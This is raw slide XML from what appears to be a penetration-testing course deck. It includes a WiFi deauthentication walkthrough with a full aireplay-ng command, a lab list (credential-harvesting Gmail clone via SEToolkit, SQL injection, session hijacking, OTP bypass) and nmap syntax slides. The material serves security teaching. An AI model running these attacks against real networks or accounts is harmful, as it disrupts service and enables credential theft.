                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To launch the attack, open a new terminal and enter the command as shown in the following screenshot.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="279400" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> aireplay-ng -0 10 -a 84:10:0D:9E:A1:CD -c 40:F0:2F:DC:7A:59 wlan0mon</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:highlight>
                <a:srgbClr val="F3F3F3"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1911" name="Google Shape;1911;p277"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="590013" y="2251075"/>
            <a:ext cx="8048625" cy="2800350"/>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Google Shape;1916;p27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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Gaining Access</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1917" name="Google Shape;1917;p278"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="863550"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Here, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> indicates that we are launching a deauthentication attack,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> indicates that we will send 10 deauthentication packets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is the target access point, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is the client’s MAC address):</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After all the deauthentication packets have been sent, return to the original window that monitors the network connection on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>channel 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, as shown in the following screenshot. You will now see the ESSID in the clear.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1918" name="Google Shape;1918;p278"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="393150" y="2635217"/>
            <a:ext cx="8439150" cy="1819825"/>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1922"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1923" name="Google Shape;1923;p279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172700" y="216750"/>
            <a:ext cx="8614800" cy="492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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud</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15.  Perform SQL injection attack using SQL Map in kaliLinux.</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16. Perform session hijacking using Zed Attack Proxy (ZAP).</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17. Exploiting vulnerabilities in android mobile operating system</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18. Perform wireless penetration testing using aircrack-ng.</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19. Demonstrate OTP Bypass using Burp Suite</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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Google Shape;1928;p280"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="554100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>OTP Bypass using Burp Suite</a:t>
            </a:r>
            <a:endParaRPr sz="240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pic>
        <p:nvPicPr>
          <p:cNvPr id="1933" name="Google Shape;1933;p281"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179260" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1934" name="Google Shape;1934;p281"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60484" y="907256"/>
            <a:ext cx="8718300" cy="4236900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>WHAT IS OTP?</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OTP stands for a one time password which is used to login in a registered account. It provides a mechanism to login into a network for a single session only.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>WHAT is brupsuite?</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Burp Suite  is one of the most popular penetration testing and vulnerability finder tools, and is often used for checking web application security</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In this project, we will explain the whole process to bypass OTP using Burp-Suite.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1935" name="Google Shape;1935;p281"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4569143" y="2691289"/>
            <a:ext cx="3746700" cy="869700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1936" name="Google Shape;1936;p281"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3862388" y="701516"/>
            <a:ext cx="2970900" cy="1208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9"/>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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="46666"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Syntax of NMAP Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385775" y="1234450"/>
            <a:ext cx="8195400" cy="3682200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-289242" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>#nmap [Scan Type] [Options] {Target Specification}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300"/>
            </a:br>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="0" indent="-289242" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Target Specification:can pass host name or IP Address e. g. scanme.nmap.org, microsoft.com, 192.168.0.1, 10.10.10.136</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-289242" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> Scan Techniques</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-289242" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
